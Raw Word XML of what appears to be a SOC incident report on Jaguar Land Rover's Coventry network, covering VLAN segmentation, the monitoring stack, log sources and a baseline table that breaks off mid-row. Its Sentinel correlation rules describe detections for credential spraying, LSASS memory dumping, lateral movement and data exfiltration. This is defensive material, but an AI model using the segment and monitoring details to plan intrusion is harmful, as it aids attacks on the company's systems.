          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A2A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Organizational Context — JLR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.1 Organization Profile</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Jaguar Land Rover (JLR) is a premium automotive OEM headquartered in Coventry, UK, designing and manufacturing vehicles including the Defender, Discovery, Range Rover, and Jaguar lineups, with a strategic pivot to full electrification across all platforms by 2030 under the Reimagine transformation plan. JLR employs approximately 35,000 people globally, with major engineering centers in Coventry and Gaydon (UK), Pune (India), and manufacturing facilities in Castle Bromwich, Solihull, Halewood (UK), and Pune.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">From a cybersecurity monitoring perspective, JLR represents one of the most complex enterprise environments in UK manufacturing:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">IT/OT convergence: Engineering workstations connect directly to manufacturing execution systems (MES) and PLC/SCADA networks on vehicle assembly lines — a critical attack path if improperly segmented.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">High-value IP: EV platform designs, battery management system (BMS) firmware, connected vehicle telematics architectures, and autonomous driving R&amp;D represent billions in intellectual property highly targeted by nation-state APTs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Supply chain complexity: Over 2,000 global supplier integrations require controlled network access to JLR systems — each representing a potential lateral entry point.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Regulatory obligations: NIS2 Directive (UK implementation) mandates incident reporting within 24 hours for operators of essential services; GDPR applies to connected vehicle telemetry data; ISO/IEC 27001 certification maintained across all major sites.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 Monitored Network Segments — Coventry Engineering HQ</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160"/>
        <w:gridCol w:w="1800"/>
        <w:gridCol w:w="1900"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="9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VLAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="16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Label</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="316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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="18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Key Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="19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Threat Priority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VLAN 10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Corporate IT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Email, SharePoint, Teams, HR, Finance systems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M365, SAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="190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92400E"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>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VLAN 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R&amp;D / Engineering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CAD workstations, EV platform design data, BMS firmware repos, simulation servers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CATIA, MATLAB, GitLab</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="19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991B1B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</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VLAN 30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OT / Mfg</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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PLC/SCADA — Electric Range Rover assembly line systems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Siemens S7, MES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="190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991B1B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL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VLAN 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Supplier Portal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Third-party supplier VPN and collaboration gateway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Supplier extranet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="19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92400E"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH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VLAN 50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Connected Vehicle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Telematics ingestion, OTA update infrastructure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Azure IoT Hub</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="190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92400E"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>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VLAN 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SOC / Mgmt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SIEM, NDR, EDR management, network device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Sentinel, Darktrace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991B1B"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CRITICAL</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VLAN 99</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Quarantine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Isolated segment for compromised/suspect devices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No services — isolated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="190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2D6A4F"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3 Security Monitoring Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The JLR SOC at Coventry Engineering HQ operates a three-layer monitoring stack providing full coverage from network traffic to endpoint behavior:</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Tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="22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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Placement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="256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Primary Function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Microsoft Sentinel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SIEM / SOAR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Azure cloud — all log sources ingested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Central correlation, alerting, playbook automation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Darktrace Enterprise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NDR (AI-driven)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Passive tap: VLAN 10, 20, 30, 40, 50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Unsupervised ML baseline; anomalous traffic detection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CrowdStrike Falcon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EDR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Agent on all Windows/Linux endpoints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Process-level threat detection, memory protection,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Palo Alto Panorama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NGFW Central Mgmt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All inter-VLAN and WAN boundary firewalls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Firewall log aggregation, policy management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Claroty Platform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OT/ICS monitoring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Passive tap on VLAN 30 OT segment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OT protocol analysis (Profinet, Modbus, S7); anomaly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Nessus Pro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Vulnerability Mgmt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Authenticated scans — IT VLANs weekly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CVE identification, patch compliance tracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A3A2A" w:sz="10" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="440"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A3A2A"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Security Monitoring Architecture and Baseline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Log Collection and Ingestion Pipeline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">All security-relevant log sources across the JLR Coventry engineering environment are ingested into Microsoft Sentinel via a structured log pipeline. The following sources are active and monitored continuously:</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2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A3A2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFE066"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">[ SENTINEL LOG SOURCE INVENTORY — JLR COVENTRY SOC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D2D2D" w:sz="1"/>
              <w:left w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:bottom w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:right w:val="single" w:color="2D2D2D" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2D2D2D" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SOURCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:left w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:bottom w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:right w:val="single" w:color="2D2D2D" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2D2D2D" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">TYPE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:left w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:bottom w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:right w:val="single" w:color="2D2D2D" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2D2D2D" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">VOLUME (daily)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:left w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:bottom w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:right w:val="single" w:color="2D2D2D" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2D2D2D" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">STATUS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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AD / Entra ID</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Authentication</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~180,000 events</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ACTIVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Palo Alto NGFW</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Traffic / Deny</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~2.4M events</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ACTIVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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CrowdStrike EDR</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Process/File</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~950,000 events</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ACTIVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Darktrace NDR</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NetFlow+AI</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~4.1M events</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ACTIVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Claroty OT</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OT Protocol</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~88,000 events</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ACTIVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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M365 / Exchange</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Email / User</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~640,000 events</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ACTIVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Azure Entra CA</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Auth / Policy</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~22,000 events</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ACTIVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Sysmon (VLAN 20)</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Endpoint</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~310,000 events</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ACTIVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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A07A"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">Siemens MES/S7</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A07A"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">OT via Claroty</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A07A"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">~11,000 events</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A07A"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">READ-ONLY</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.2 Sentinel Correlation Rules Active at Time of Incident</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The following Microsoft Sentinel analytics rules were active and contributing to detection of INC-JLR-2026-0312:</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2600"/>
        <w:gridCol w:w="2400"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="12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Rule ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="316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Rule Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Trigger Condition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="24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Severity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CORR-041</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Impossible Travel — Authentication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Same user auth from 2+ countries within 1 hour</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240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92400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CORR-078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VLAN Lateral Movement — IT to R&amp;D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Non-R&amp;D asset accessing VLAN 20 resources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991B1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CORR-112</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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OT Boundary Probe Attempt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Any VLAN 20 asset sending traffic to VLAN 30 gateway</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240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991B1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CORR-033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Credential Spray — Service Account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&gt;10 failed auth attempts on service account in 5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92400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CORR-055</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Abnormal Process Execution (EDR)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CrowdStrike alert: LSASS memory access from non-system proc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="240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991B1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CORR-091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Mass File Enumeration — File Server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&gt;500 file open events from single user in 10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92400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CORR-007</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Darktrace AI: Unusual Beaconing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Darktrace model breach: Device / Unusual External Data Transfer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92400E"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">HIGH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="300"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2D2D2D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3.3 Established Baseline — Pre-Incident Normal Activity</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Prior to INC-JLR-2026-0312, the following baseline patterns were established for the affected users, systems, and network segments. Deviations from this baseline were the primary triggers for detection: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2A" w:sz="1"/>
              <w:left w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:bottom w:val="single" w:color="1A3A2A" w:sz="1"/>
              <w:right w:val="single" w:color="1A3A2A" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A3A2A" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFE066"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">[ SENTINEL BASELINE — VLAN 10/20 NORMAL ACTIVITY PROFILE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D2D2D" w:sz="1"/>
              <w:left w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:bottom w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:right w:val="single" w:color="2D2D2D" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2D2D2D" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">METRIC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:left w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:bottom w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:right w:val="single" w:color="2D2D2D" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2D2D2D" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">NORMAL BASELINE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:left w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:bottom w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:right w:val="single" w:color="2D2D2D" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2D2D2D" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">INCIDENT VALUE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2340"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:left w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:bottom w:val="single" w:color="2D2D2D" w:sz="1"/>
              <w:right w:val="single" w:color="2D2D2D" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="2D2D2D" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="100"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="100"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="00E5FF"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">DELTA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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Auth events / user / day</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8–12</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6B6B"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:t xml:space="preserve">47</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6B6B"/>
                <w:sz w:val="15"/>
